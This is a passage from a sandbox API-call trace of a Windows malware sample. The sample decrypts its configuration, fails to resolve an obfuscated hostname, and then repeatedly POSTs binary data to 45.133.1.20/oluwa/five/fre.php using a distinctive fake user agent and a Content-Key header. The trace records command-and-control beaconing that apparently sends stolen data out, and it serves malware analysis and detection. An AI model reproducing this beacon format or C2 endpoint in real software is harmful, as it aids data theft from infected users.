(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0177.761] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.762] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0177.762] GetProcessHeap () returned 0x6a0000 [0177.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0177.762] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0177.762] GetProcessHeap () returned 0x6a0000 [0177.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0177.763] GetProcessHeap () returned 0x6a0000 [0177.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0177.763] GetProcessHeap () returned 0x6a0000 [0177.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0177.763] GetProcessHeap () returned 0x6a0000 [0177.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0177.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.765] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.772] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0177.779] GetProcessHeap () returned 0x6a0000 [0177.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0177.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.780] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0177.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.782] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.783] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.783] GetProcessHeap () returned 0x6a0000 [0177.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0177.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.785] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0177.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.786] CryptDestroyKey (hKey=0x6ad020) returned 1 [0177.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.790] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0177.790] GetProcessHeap () returned 0x6a0000 [0177.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0177.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.791] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0177.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.835] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0177.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.836] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0177.837] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.838] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0177.842] GetProcessHeap () returned 0x6a0000 [0177.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0177.843] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9f50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be970*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0177.843] GetProcessHeap () returned 0x6a0000 [0177.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0177.843] socket (af=2, type=1, protocol=6) returned 0x3b4 [0177.843] connect (s=0x3b4, name=0x6be970*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0177.872] FreeAddrInfoW (pAddrInfo=0x6b9f50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be970*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0177.872] GetProcessHeap () returned 0x6a0000 [0177.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0177.873] GetProcessHeap () returned 0x6a0000 [0177.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0177.874] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0177.875] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0177.875] GetProcessHeap () returned 0x6a0000 [0177.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0177.875] GetProcessHeap () returned 0x6a0000 [0177.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0177.876] GetProcessHeap () returned 0x6a0000 [0177.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0177.876] GetProcessHeap () returned 0x6a0000 [0177.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0177.877] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0177.880] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0177.880] GetProcessHeap () returned 0x6a0000 [0177.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0177.880] GetProcessHeap () returned 0x6a0000 [0177.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0177.880] send (s=0x3b4, buf=0x6bbd20*, len=242, flags=0) returned 242 [0177.881] send (s=0x3b4, buf=0x6bb998*, len=159, flags=0) returned 159 [0177.881] GetProcessHeap () returned 0x6a0000 [0177.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0177.881] recv (in: s=0x3b4, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0177.958] GetProcessHeap () returned 0x6a0000 [0177.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0177.959] GetProcessHeap () returned 0x6a0000 [0177.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0177.959] GetProcessHeap () returned 0x6a0000 [0177.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0177.960] GetProcessHeap () returned 0x6a0000 [0177.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0177.960] closesocket (s=0x3b4) returned 0 [0177.961] GetProcessHeap () returned 0x6a0000 [0177.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0177.961] GetProcessHeap () returned 0x6a0000 [0177.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0177.962] GetProcessHeap () returned 0x6a0000 [0177.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0177.962] GetProcessHeap () returned 0x6a0000 [0177.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0177.976] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfe0) returned 0x3b4 [0177.979] Sleep (dwMilliseconds=0xea60) [0177.980] GetProcessHeap () returned 0x6a0000 [0177.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0177.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.982] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.996] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0178.010] GetProcessHeap () returned 0x6a0000 [0178.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0178.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.011] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0178.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.029] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0178.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.030] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.030] GetProcessHeap () returned 0x6a0000 [0178.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0178.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.034] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0178.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.036] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0178.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.037] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0178.037] GetProcessHeap () returned 0x6a0000 [0178.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0178.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.038] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0178.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.040] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0178.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.041] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0178.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.045] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0178.045] GetProcessHeap () returned 0x6a0000 [0178.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0178.045] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0178.046] GetProcessHeap () returned 0x6a0000 [0178.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0178.046] GetProcessHeap () returned 0x6a0000 [0178.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0178.047] GetProcessHeap () returned 0x6a0000 [0178.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0178.047] GetProcessHeap () returned 0x6a0000 [0178.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0178.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.049] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0178.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.056] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0178.068] GetProcessHeap () returned 0x6a0000 [0178.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0178.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.069] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0178.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.071] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0178.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.072] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.073] GetProcessHeap () returned 0x6a0000 [0178.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0178.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.074] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0178.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.079] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0178.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.080] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0178.080] GetProcessHeap () returned 0x6a0000 [0178.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0178.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.082] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0178.083] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.083] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0178.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.098] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0178.099] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.099] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0178.099] GetProcessHeap () returned 0x6a0000 [0178.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0178.100] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9e60*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0178.100] GetProcessHeap () returned 0x6a0000 [0178.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0178.100] socket (af=2, type=1, protocol=6) returned 0x3b8 [0178.100] connect (s=0x3b8, name=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0178.122] FreeAddrInfoW (pAddrInfo=0x6b9e60*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0178.122] GetProcessHeap () returned 0x6a0000 [0178.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0178.122] GetProcessHeap () returned 0x6a0000 [0178.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0178.123] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0178.124] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0178.124] GetProcessHeap () returned 0x6a0000 [0178.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0178.124] GetProcessHeap () returned 0x6a0000 [0178.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0178.125] GetProcessHeap () returned 0x6a0000 [0178.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0178.125] GetProcessHeap () returned 0x6a0000 [0178.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0178.126] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0178.128] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0178.128] GetProcessHeap () returned 0x6a0000 [0178.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0178.128] GetProcessHeap () returned 0x6a0000 [0178.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0178.129] send (s=0x3b8, buf=0x6bbd20*, len=242, flags=0) returned 242 [0178.129] send (s=0x3b8, buf=0x6bb998*, len=159, flags=0) returned 159 [0178.130] GetProcessHeap () returned 0x6a0000 [0178.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0178.130] recv (in: s=0x3b8, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0178.212] GetProcessHeap () returned 0x6a0000 [0178.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0178.213] GetProcessHeap () returned 0x6a0000 [0178.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0178.213] GetProcessHeap () returned 0x6a0000 [0178.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0178.214] GetProcessHeap () returned 0x6a0000 [0178.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0178.214] closesocket (s=0x3b8) returned 0 [0178.215] GetProcessHeap () returned 0x6a0000 [0178.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0178.215] GetProcessHeap () returned 0x6a0000 [0178.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0178.215] GetProcessHeap () returned 0x6a0000 [0178.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0178.216] GetProcessHeap () returned 0x6a0000 [0178.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0178.216] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x4b0) returned 0x3b8 [0178.218] Sleep (dwMilliseconds=0xea60) [0178.220] GetProcessHeap () returned 0x6a0000 [0178.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0178.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.221] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0178.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.233] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0178.245] GetProcessHeap () returned 0x6a0000 [0178.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9fc8 [0178.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.247] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b9fc8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0178.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.249] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0178.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.250] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.250] GetProcessHeap () returned 0x6a0000 [0178.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9fc8 | out: hHeap=0x6a0000) returned 1 [0178.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.252] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0178.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.253] CryptDestroyKey (hKey=0x6ad020) returned 1 [0178.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.258] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0178.258] GetProcessHeap () returned 0x6a0000 [0178.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0178.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.265] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0178.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.267] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0178.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.268] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0178.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.268] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0178.269] GetProcessHeap () returned 0x6a0000 [0178.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0178.269] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", 